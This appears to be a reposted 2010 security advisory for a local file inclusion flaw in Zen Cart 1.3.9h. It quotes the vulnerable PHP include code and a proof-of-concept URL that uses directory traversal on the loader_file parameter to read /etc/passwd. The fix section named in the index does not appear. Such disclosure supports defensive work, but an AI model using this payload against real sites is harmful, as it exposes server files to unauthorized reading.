Zen Cart 1.3.9h Local File Inclusion Vulnerability

2010, November 6, 12:38 PM. oday收藏
Submitted by admin

Zen Cart 1.3.9h Local File Inclusion Vulnerability 

  

 Name              Zen Cart 

 Vendor            http://www.zen-cart.com 

 Versions Affected 1.3.9h 

  

 Author            Salvatore Fresta aka Drosophila 

 Website           http://www.salvatorefresta.net 

 Contact           salvatorefresta [at] gmail [dot] com 

 Date              2010-11-03 

  

X. INDEX 

  

 I.    ABOUT THE APPLICATION 

 II.   DESCRIPTION 

 III.  ANALYSIS 

 IV.   SAMPLE CODE 

 V.    FIX 

   

  

I. ABOUT THE APPLICATION 

________________________ 

  

Zen Cart   truly   is   the  art  of   e-commerce;  free, 

user-friendly,  open  source  shopping cart software. The 

ecommerce web site design program is being developed by a 

group of like-minded shop owners, programmers, designers, 

and consultants that think ecommerce web design could  be 

and should be done differently. 

  

  

II. DESCRIPTION 

_______________ 

  

A parameter is not properly sanitised before being  used 

by the include() PHP's function. 

  

  

III. ANALYSIS 

_____________ 

  

Summary: 

  

 A) Local File Inclusion 

   

  

A) Local File Inclusion 

_______________________ 

  

Input   passed   to   the   "loader_file"   parameter  in 

includes/initsystem.php  is  not properly verified before 

being  used  to  include  files. This can be exploited to 

include  arbitrary  files   from   local   resources  via 

directory traversal attacks. 

  

Successful exploitation requires that register_globals is 

set to On. 

  

The following is the vulnerable code: 

  

<?php 

  

$base_dir = DIR_WS_INCLUDES . 'auto_loaders/'; 

if (file_exists(DIR_WS_INCLUDES . 'auto_loaders/overrides/' . $loader_file)) { 

  $base_dir = DIR_WS_INCLUDES . 'auto_loaders/overrides/'; 

  

include($base_dir . $loader_file); 

  

  

IV. SAMPLE CODE 

_______________ 

  

A) Local File Inclusion 

  

http://site/path/includes/initsystem.php?loader_file=../../../../../../../../etc/passwd 

Tags: zen

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Zen Cart 1.3.8 Remote SQL Execution (浏览: 10805, 评论: 0)
Zen Cart 1.3.8 Remote Code Execution (浏览: 9810, 评论: 0)
zen cart 1.38a以下 通杀ODAY (浏览: 18565, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):